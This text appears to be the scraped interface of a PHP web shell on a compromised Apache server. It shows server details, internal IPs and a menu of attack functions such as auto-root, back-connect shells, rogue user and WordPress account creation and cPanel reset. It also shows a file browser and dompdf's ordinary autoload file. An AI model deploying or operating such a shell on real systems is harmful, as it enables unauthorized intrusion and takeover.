Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
third_party /
dompdf /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-x--x
src
[ DIR ]
drwxr-x--x
.travis.yml
491
B
-rwxr-x--x
CONTRIBUTING.md
2.96
KB
-rwxr-x--x
LICENSE.LGPL
23.78
KB
-rwxr-x--x
README.md
7.31
KB
-rwxr-x--x
VERSION
6
B
-rwxr-x--x
autoload.inc.php
1.06
KB
-rwxr-x--x
composer.json
1.41
KB
-rwxr-x--x
phpcs.xml
4.71
KB
-rwxr-x--x
phpunit.xml.dist
603
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload.inc.php
<?php /** * @package dompdf * @link http://dompdf.github.com/ * @author Benj Carson <benjcarson@digitaljunkies.ca> * @author Fabien Ménager <fabien.menager@gmail.com> * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License */ // HMLT5 Parser //FIXME: replace with masterminds HTML5 //require_once __DIR__ . '/lib/html5lib/Parser.php'; // Sabberworm spl_autoload_register(function($class) { if (strpos($class, 'Sabberworm') !== false) { $file = str_replace('\\', DIRECTORY_SEPARATOR, $class); $file = realpath(__DIR__ . '/lib/php-css-parser/lib/' . (empty($file) ? '' : DIRECTORY_SEPARATOR) . $file . '.php'); if (file_exists($file)) { require_once $file; return true; } } return false; }); // php-font-lib require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php'; //php-svg-lib require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php'; /* * New PHP 5.3.0 namespaced autoloader */ require_once __DIR__ . '/src/Autoloader.php'; Dompdf\Autoloader::register();
Close